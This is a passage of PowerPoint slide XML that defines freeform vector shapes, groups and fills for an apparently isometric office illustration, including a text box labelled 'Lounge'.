                  <a:gd name="T16" fmla="*/ 145 w 760"/>
                  <a:gd name="T17" fmla="*/ 966 h 1011"/>
                  <a:gd name="T18" fmla="*/ 145 w 760"/>
                  <a:gd name="T19" fmla="*/ 1011 h 1011"/>
                  <a:gd name="T20" fmla="*/ 720 w 760"/>
                  <a:gd name="T21" fmla="*/ 262 h 1011"/>
                  <a:gd name="T22" fmla="*/ 720 w 760"/>
                  <a:gd name="T23" fmla="*/ 217 h 1011"/>
                  <a:gd name="T24" fmla="*/ 720 w 760"/>
                  <a:gd name="T25" fmla="*/ 15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60" h="1011">
                    <a:moveTo>
                      <a:pt x="720" y="15"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="715" y="12"/>
                      <a:pt x="711" y="10"/>
                      <a:pt x="705" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="654" y="0"/>
                      <a:pt x="574" y="58"/>
                      <a:pt x="503" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="503" y="149"/>
                      <a:pt x="503" y="149"/>
                      <a:pt x="503" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="570"/>
                      <a:pt x="179" y="570"/>
                      <a:pt x="179" y="570"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="575"/>
                      <a:pt x="172" y="580"/>
                      <a:pt x="169" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="618"/>
                      <a:pt x="115" y="657"/>
                      <a:pt x="91" y="699"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="845"/>
                      <a:pt x="0" y="973"/>
                      <a:pt x="68" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="991"/>
                      <a:pt x="116" y="983"/>
                      <a:pt x="145" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="1011"/>
                      <a:pt x="145" y="1011"/>
                      <a:pt x="145" y="1011"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="720" y="262"/>
                      <a:pt x="720" y="262"/>
                      <a:pt x="720" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="720" y="217"/>
                      <a:pt x="720" y="217"/>
                      <a:pt x="720" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="759" y="118"/>
                      <a:pt x="760" y="38"/>
                      <a:pt x="720" y="15"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A0A0A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690" name="Group 438">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{955A9141-EFC0-4FE6-A095-1DA777330F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9237" y="2928543"/>
              <a:ext cx="684457" cy="203552"/>
              <a:chOff x="1956" y="1206"/>
              <a:chExt cx="575" cy="171"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2250" name="Freeform 432">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{406E6DAC-EE70-4B82-AA5A-C7423338A6A3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1956" y="1206"/>
                <a:ext cx="573" cy="154"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 600 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 359 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 600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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="600"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="600"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="C0C0C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51" name="Freeform 436">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FDA20C4-B2F0-4789-81F1-6ACA38E12CC8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1958" y="1268"/>
                <a:ext cx="358" cy="109"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 603 h 679"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 679"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 76 h 679"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 679 h 679"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 603 h 6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39" h="679">
                    <a:moveTo>
                      <a:pt x="0" y="603"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="603"/>
                    </a:ln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969696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52" name="Freeform 437">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8C9DF8-A564-404B-A22D-415B1711BA22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2316" y="1307"/>
                <a:ext cx="215" cy="70"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 438"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 362 h 438"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 438 h 438"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 76 h 438"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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38">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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969696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691" name="Group 445">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5553174D-90C9-4042-BCFC-EFECB30F072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731976" y="4048673"/>
              <a:ext cx="684456" cy="203551"/>
              <a:chOff x="1956" y="1206"/>
              <a:chExt cx="575" cy="171"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2247" name="Freeform 446">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57339079-00C6-47F6-B417-EA91C9D9EACD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1956" y="1206"/>
                <a:ext cx="573" cy="154"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 600 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 359 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 600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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="600"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="600"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="C0C0C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48" name="Freeform 447">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1110A9DA-095F-4001-A7F7-FEE02A80ADAD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1958" y="1268"/>
                <a:ext cx="358" cy="109"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 603 h 679"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 679"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 76 h 679"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 679 h 679"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 603 h 6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39" h="679">
                    <a:moveTo>
                      <a:pt x="0" y="603"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="603"/>
                    </a:ln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969696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49" name="Freeform 448">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8402E200-A1F2-42CE-84F4-6787376C7401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2316" y="1307"/>
                <a:ext cx="215" cy="70"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 438"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 362 h 438"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 438 h 438"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 76 h 438"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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38">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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969696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692" name="Freeform 443">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AB84D5C-3AC6-4849-8B6D-24809B3B2F58}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2741694" y="2888073"/>
              <a:ext cx="1547469" cy="416627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CACACA"/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93" name="Text Box 847">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59B63417-49B4-4455-B09E-97EDD3CB05BB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2616706" y="3266608"/>
              <a:ext cx="534472" cy="227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Lounge</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1694" name="Freeform 976">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C960284-7635-40CC-8856-E229BC4F07C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="5681884" y="2594052"/>
              <a:ext cx="151175" cy="198790"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 451"/>
                <a:gd name="T1" fmla="*/ 0 h 590"/>
                <a:gd name="T2" fmla="*/ 0 w 451"/>
                <a:gd name="T3" fmla="*/ 470 h 590"/>
                <a:gd name="T4" fmla="*/ 451 w 451"/>
                <a:gd name="T5" fmla="*/ 590 h 590"/>
                <a:gd name="T6" fmla="*/ 451 w 451"/>
                <a:gd name="T7" fmla="*/ 123 h 590"/>
                <a:gd name="T8" fmla="*/ 0 w 451"/>
                <a:gd name="T9" fmla="*/ 0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1" h="590">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451" y="590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451" y="1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95" name="Freeform 977">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CEAC580-1D03-4890-B1E9-89C438AB93ED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9532" y="2660713"/>
              <a:ext cx="453527" cy="121417"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1353"/>
                <a:gd name="T1" fmla="*/ 241 h 362"/>
                <a:gd name="T2" fmla="*/ 902 w 1353"/>
                <a:gd name="T3" fmla="*/ 0 h 362"/>
                <a:gd name="T4" fmla="*/ 1353 w 1353"/>
                <a:gd name="T5" fmla="*/ 121 h 362"/>
                <a:gd name="T6" fmla="*/ 454 w 1353"/>
                <a:gd name="T7" fmla="*/ 362 h 362"/>
                <a:gd name="T8" fmla="*/ 0 w 1353"/>
                <a:gd name="T9" fmla="*/ 241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53" h="362">
                  <a:moveTo>
                    <a:pt x="0" y="241"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="902" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1353" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="362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96" name="Freeform 979">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A4E5CC7-1D74-44E8-B951-011007723C2C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9532" y="2692852"/>
              <a:ext cx="152366" cy="180935"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 452"/>
                <a:gd name="T1" fmla="*/ 0 h 536"/>
                <a:gd name="T2" fmla="*/ 196 w 452"/>
                <a:gd name="T3" fmla="*/ 196 h 536"/>
                <a:gd name="T4" fmla="*/ 0 w 452"/>
                <a:gd name="T5" fmla="*/ 144 h 536"/>
                <a:gd name="T6" fmla="*/ 0 w 452"/>
                <a:gd name="T7" fmla="*/ 416 h 536"/>
                <a:gd name="T8" fmla="*/ 452 w 452"/>
                <a:gd name="T9" fmla="*/ 536 h 536"/>
                <a:gd name="T10" fmla="*/ 452 w 452"/>
                <a:gd name="T11" fmla="*/ 69 h 536"/>
                <a:gd name="T12" fmla="*/ 196 w 452"/>
                <a:gd name="T13" fmla="*/ 0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2" h="536">
                  <a:moveTo>
                    <a:pt x="196" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="196" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452" y="536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452" y="69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97" name="Freeform 981">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59F517EA-7114-4396-815F-4DFBA8EED3C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="5077181" y="2653571"/>
              <a:ext cx="152366" cy="179744"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 255 w 454"/>
                <a:gd name="T1" fmla="*/ 0 h 536"/>
                <a:gd name="T2" fmla="*/ 258 w 454"/>
                <a:gd name="T3" fmla="*/ 196 h 536"/>
                <a:gd name="T4" fmla="*/ 454 w 454"/>
                <a:gd name="T5" fmla="*/ 144 h 536"/>
                <a:gd name="T6" fmla="*/ 454 w 454"/>
                <a:gd name="T7" fmla="*/ 415 h 536"/>
                <a:gd name="T8" fmla="*/ 0 w 454"/>
                <a:gd name="T9" fmla="*/ 536 h 536"/>
                <a:gd name="T10" fmla="*/ 0 w 454"/>
                <a:gd name="T11" fmla="*/ 68 h 536"/>
                <a:gd name="T12" fmla="*/ 255 w 454"/>
                <a:gd name="T13" fmla="*/ 0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4" h="536">
                  <a:moveTo>
                    <a:pt x="255" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="258" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="68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98" name="Freeform 982">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EB83C68-62AF-4E2A-BDB7-69B13190D371}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="5077181" y="2701184"/>
              <a:ext cx="454717" cy="122607"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1354 w 1354"/>
                <a:gd name="T1" fmla="*/ 241 h 363"/>
                <a:gd name="T2" fmla="*/ 454 w 1354"/>
                <a:gd name="T3" fmla="*/ 0 h 363"/>
                <a:gd name="T4" fmla="*/ 0 w 1354"/>
                <a:gd name="T5" fmla="*/ 120 h 363"/>
                <a:gd name="T6" fmla="*/ 902 w 1354"/>
                <a:gd name="T7" fmla="*/ 363 h 363"/>
                <a:gd name="T8" fmla="*/ 1354 w 1354"/>
                <a:gd name="T9" fmla="*/ 241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54" h="363">
                  <a:moveTo>
                    <a:pt x="1354" y="241"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="454" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="902" y="363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1354" y="241"/>
                  </a:ln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99" name="Group 1175">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{126922DF-B43D-41D0-8E29-C2D8BB70CD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77181" y="2483349"/>
              <a:ext cx="755879" cy="432101"/>
              <a:chOff x="2383" y="1710"/>
              <a:chExt cx="635" cy="363"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="2229" name="Group 986">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A07497AC-445E-4CA7-A267-D3BACCEC631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2659" y="1710"/>
                <a:ext cx="118" cy="309"/>
                <a:chOff x="-3734" y="3542"/>
                <a:chExt cx="418" cy="1113"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2235" name="Freeform 987">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87909560-7269-41C3-8D98-0793E10F3DA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3630" y="4050"/>
                  <a:ext cx="217" cy="605"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 81 w 92"/>
                    <a:gd name="T1" fmla="*/ 3 h 256"/>
                    <a:gd name="T2" fmla="*/ 81 w 92"/>
                    <a:gd name="T3" fmla="*/ 3 h 256"/>
                    <a:gd name="T4" fmla="*/ 4 w 92"/>
                    <a:gd name="T5" fmla="*/ 0 h 256"/>
                    <a:gd name="T6" fmla="*/ 1 w 92"/>
                    <a:gd name="T7" fmla="*/ 29 h 256"/>
                    <a:gd name="T8" fmla="*/ 11 w 92"/>
                    <a:gd name="T9" fmla="*/ 217 h 256"/>
                    <a:gd name="T10" fmla="*/ 45 w 92"/>
                    <a:gd name="T11" fmla="*/ 216 h 256"/>
                    <a:gd name="T12" fmla="*/ 42 w 92"/>
                    <a:gd name="T13" fmla="*/ 55 h 256"/>
                    <a:gd name="T14" fmla="*/ 33 w 92"/>
                    <a:gd name="T15" fmla="*/ 43 h 256"/>
                    <a:gd name="T16" fmla="*/ 42 w 92"/>
                    <a:gd name="T17" fmla="*/ 55 h 256"/>
                    <a:gd name="T18" fmla="*/ 45 w 92"/>
                    <a:gd name="T19" fmla="*/ 216 h 256"/>
                    <a:gd name="T20" fmla="*/ 45 w 92"/>
                    <a:gd name="T21" fmla="*/ 222 h 256"/>
                    <a:gd name="T22" fmla="*/ 81 w 92"/>
                    <a:gd name="T23" fmla="*/ 229 h 256"/>
                    <a:gd name="T24" fmla="*/ 87 w 92"/>
                    <a:gd name="T25" fmla="*/ 53 h 256"/>
                    <a:gd name="T26" fmla="*/ 81 w 92"/>
                    <a:gd name="T27" fmla="*/ 3 h 2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92" h="256">
                      <a:moveTo>
                        <a:pt x="81" y="3"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="81" y="4"/>
                        <a:pt x="81" y="3"/>
                        <a:pt x="81" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="78" y="14"/>
                        <a:pt x="3" y="5"/>
                        <a:pt x="4" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="18"/>
                        <a:pt x="0" y="25"/>
                        <a:pt x="1" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="49"/>
                        <a:pt x="11" y="130"/>
                        <a:pt x="11" y="217"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="240"/>
                        <a:pt x="44" y="236"/>
                        <a:pt x="45" y="216"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="182"/>
                        <a:pt x="43" y="58"/>
                        <a:pt x="42" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="51"/>
                        <a:pt x="33" y="50"/>
                        <a:pt x="33" y="43"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="50"/>
                        <a:pt x="42" y="51"/>
                        <a:pt x="42" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="58"/>
                        <a:pt x="44" y="182"/>
                        <a:pt x="45" y="216"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="218"/>
                        <a:pt x="45" y="222"/>
                        <a:pt x="45" y="222"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="256"/>
                        <a:pt x="81" y="247"/>
                        <a:pt x="81" y="229"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="81" y="162"/>
                        <a:pt x="84" y="68"/>
                        <a:pt x="87" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="28"/>
                        <a:pt x="83" y="5"/>
                        <a:pt x="81" y="3"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="9DC2EB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36" name="Freeform 988">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B03C32A-A7CB-4967-B442-0F44D5509772}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-3734" y="3696"/>
                  <a:ext cx="418" cy="508"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 172 w 177"/>
                    <a:gd name="T1" fmla="*/ 191 h 215"/>
                    <a:gd name="T2" fmla="*/ 151 w 177"/>
                    <a:gd name="T3" fmla="*/ 44 h 215"/>
                    <a:gd name="T4" fmla="*/ 125 w 177"/>
                    <a:gd name="T5" fmla="*/ 19 h 215"/>
                    <a:gd name="T6" fmla="*/ 91 w 177"/>
                    <a:gd name="T7" fmla="*/ 10 h 215"/>
                    <a:gd name="T8" fmla="*/ 61 w 177"/>
                    <a:gd name="T9" fmla="*/ 2 h 215"/>
                    <a:gd name="T10" fmla="*/ 31 w 177"/>
                    <a:gd name="T11" fmla="*/ 12 h 215"/>
                    <a:gd name="T12" fmla="*/ 4 w 177"/>
                    <a:gd name="T13" fmla="*/ 156 h 215"/>
                    <a:gd name="T14" fmla="*/ 26 w 177"/>
                    <a:gd name="T15" fmla="*/ 165 h 215"/>
                    <a:gd name="T16" fmla="*/ 41 w 177"/>
                    <a:gd name="T17" fmla="*/ 70 h 215"/>
                    <a:gd name="T18" fmla="*/ 49 w 177"/>
                    <a:gd name="T19" fmla="*/ 85 h 215"/>
                    <a:gd name="T20" fmla="*/ 48 w 177"/>
                    <a:gd name="T21" fmla="*/ 150 h 215"/>
                    <a:gd name="T22" fmla="*/ 58 w 177"/>
                    <a:gd name="T23" fmla="*/ 161 h 215"/>
                    <a:gd name="T24" fmla="*/ 102 w 177"/>
                    <a:gd name="T25" fmla="*/ 172 h 215"/>
                    <a:gd name="T26" fmla="*/ 125 w 177"/>
                    <a:gd name="T27" fmla="*/ 153 h 215"/>
                    <a:gd name="T28" fmla="*/ 127 w 177"/>
                    <a:gd name="T29" fmla="*/ 67 h 215"/>
                    <a:gd name="T30" fmla="*/ 129 w 177"/>
                    <a:gd name="T31" fmla="*/ 85 h 215"/>
                    <a:gd name="T32" fmla="*/ 150 w 177"/>
                    <a:gd name="T33" fmla="*/ 201 h 215"/>
                    <a:gd name="T34" fmla="*/ 172 w 177"/>
                    <a:gd name="T35" fmla="*/ 191 h 215"/>
                    <a:gd name="T36" fmla="*/ 43 w 177"/>
                    <a:gd name="T37" fmla="*/ 56 h 215"/>
                    <a:gd name="T38" fmla="*/ 45 w 177"/>
                    <a:gd name="T39" fmla="*/ 44 h 215"/>
                    <a:gd name="T40" fmla="*/ 44 w 177"/>
                    <a:gd name="T41" fmla="*/ 55 h 215"/>
                    <a:gd name="T42" fmla="*/ 44 w 177"/>
